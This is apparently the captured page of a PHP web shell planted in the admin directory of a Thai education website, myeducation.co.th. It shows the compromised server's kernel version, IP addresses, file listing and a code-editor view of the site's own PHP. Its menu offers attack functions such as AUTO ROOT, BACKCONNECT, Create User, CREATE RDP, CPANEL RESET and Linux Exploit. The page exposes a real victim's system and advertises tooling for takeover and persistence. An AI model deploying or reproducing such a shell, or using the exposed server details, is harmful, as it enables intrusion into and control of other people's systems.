Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.223.99.202
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
myeducation.co.th /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
2Navbar_Side
[ DIR ]
drwxr-xr-x
DropDownCategory
[ DIR ]
drwxr-xr-x
PageWrapper
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
1First_Head.php
4.92
KB
-rw-r--r--
2Nav_BarTop.php
4.05
KB
-rw-r--r--
2Navbar_Side.php
2.65
KB
-rw-r--r--
3Page_Wrapper.php
1.76
KB
-rw-r--r--
4End_Head.php
943
B
-rw-r--r--
Article.php
663
B
-rw-r--r--
ArticleEdit.php
535
B
-rw-r--r--
Home.php
1.3
KB
-rw-r--r--
HomeEdit.php
534
B
-rw-r--r--
Management_Menu.php
1.3
KB
-rw-r--r--
Management_Menu_Create_Form.ph...
808
B
-rw-r--r--
MemberList.php
534
B
-rw-r--r--
Product.php
884
B
-rw-r--r--
ProductCategoryEdit.php
544
B
-rw-r--r--
ProductCategoryEdit2.php
545
B
-rw-r--r--
ProductCategoryEdit3.php
545
B
-rw-r--r--
ProductEdit.php
535
B
-rw-r--r--
Product_Category.php
549
B
-rw-r--r--
Product_Category2.php
550
B
-rw-r--r--
Product_Category3.php
550
B
-rw-r--r--
Register.php
532
B
-rw-r--r--
RegisterEdit.php
536
B
-rw-r--r--
Schedule.php
714
B
-rw-r--r--
ScheduletEdit.php
537
B
-rw-r--r--
Setting.php
540
B
-rw-r--r--
amphur.php
497
B
-rw-r--r--
amphurEdit.php
535
B
-rw-r--r--
contact.php
582
B
-rw-r--r--
contactview.php
539
B
-rw-r--r--
index.php
1.11
KB
-rw-r--r--
login.php
1.73
KB
-rw-r--r--
showpage.php
541
B
-rw-r--r--
showpageEdit.php
536
B
-rw-r--r--
system_payment.php
728
B
-rw-r--r--
upload_file.php
1.05
KB
-rw-r--r--
upload_image.php
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Management_Menu.php
<?PHP include '1First_Head.php'; ?> <div id="wrapper"> <!-- navbar top --> <?PHP include '2Nav_BarTop.php'; ?> <!-- end navbar top --> <!-- navbar side --> <?PHP include '2Navbar_Side.php'; ?> <!-- end navbar side --> <?PHP if (isset($_GET['Mam']) ) { $Management = trim($_GET['Mam']); $StatusShowPage = trim($_GET['StatusShowPage_ID']); $_SESSION['ses_StatusShowPage'] = $StatusShowPage; $StatusShowPage = $_SESSION['ses_StatusShowPage']; }else{ $Management= "0"; $StatusShowPage= "0"; } if (isset($_GET['FID']) AND isset($_GET['MID']) ) { $Chk_Fuse_ID = trim($_GET['FID']); $Chk_Member_ID = trim($_GET['MID']); }else{ $Fuse_ID= "0"; $Member_ID= "0"; } //echo $StatusShowPage; if($Management == "0"){ include 'PageWrapper/PageWrapper_0NotFound.php'; }else if($Management == "Home"){ // include 'PageWrapper/PageWrapper_1Home.php'; include 'PageWrapper/PageWrapper_1Home_Edit.php'; }else if($Management == "HomeProfile"){ ; include 'PageWrapper/PageWrapper_1Home_Profile.php'; } ?> </div> <!-- end wrapper --> <?PHP include '4End_Head.php'; ?>
Close